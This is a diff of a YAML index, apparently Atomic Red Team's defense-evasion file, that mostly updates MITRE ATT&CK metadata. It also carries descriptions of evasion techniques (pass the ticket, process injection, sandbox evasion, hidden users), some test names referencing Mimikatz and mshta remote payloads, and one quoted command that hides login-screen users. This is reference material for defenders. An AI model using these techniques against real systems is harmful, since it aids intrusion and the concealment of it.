       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -13965,9 +14082,8 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests:
     - name: Indicator Removal using FSUtil
@@ -14014,7 +14130,7 @@ defense-evasion:
         elevation_required: false
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -14034,6 +14150,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -14041,7 +14158,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -14057,34 +14173,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests:
     - name: Mimikatz Kerberos Ticket Attack
@@ -14251,7 +14368,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.004
     atomic_tests:
     - name: Creating W32Time similar named service using schtasks
@@ -14320,7 +14436,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -14369,8 +14485,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests:
     - name: Process Injection via C#
@@ -14508,7 +14622,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -14529,7 +14643,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -14596,7 +14709,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests:
     - name: Mount ISO image
@@ -14760,7 +14872,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -14781,8 +14893,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -14843,11 +14953,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -14912,7 +15021,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -14936,7 +15044,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -14980,8 +15088,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests:
     - name: Portable Executable Injection
@@ -15071,7 +15177,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -15095,7 +15201,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -15186,7 +15291,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests:
     - name: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI
@@ -15261,35 +15365,7 @@ defense-evasion:
           default: Invoke-Mimikatz
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -15301,6 +15377,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -15311,8 +15391,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -15322,9 +15408,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -15377,7 +15482,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -15415,8 +15520,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests:
     - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -15693,62 +15796,68 @@ defense-evasion:
         name: command_prompt
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -15806,7 +15915,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests:
     - name: Named pipe client impersonation
@@ -15971,7 +16079,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -15996,8 +16104,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -16058,7 +16164,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -16131,7 +16236,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -16160,7 +16265,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests:
     - name: Create Hidden User in Registry
@@ -16249,11 +16353,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -16338,7 +16441,6 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests:
     - name: Disable Windows Command Line Auditing using reg.exe
@@ -16409,7 +16511,7 @@ defense-evasion:
           '
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -16484,45 +16586,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -16546,6 +16613,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -16556,9 +16626,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -16568,8 +16643,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -16626,7 +16728,7 @@ defense-evasion:
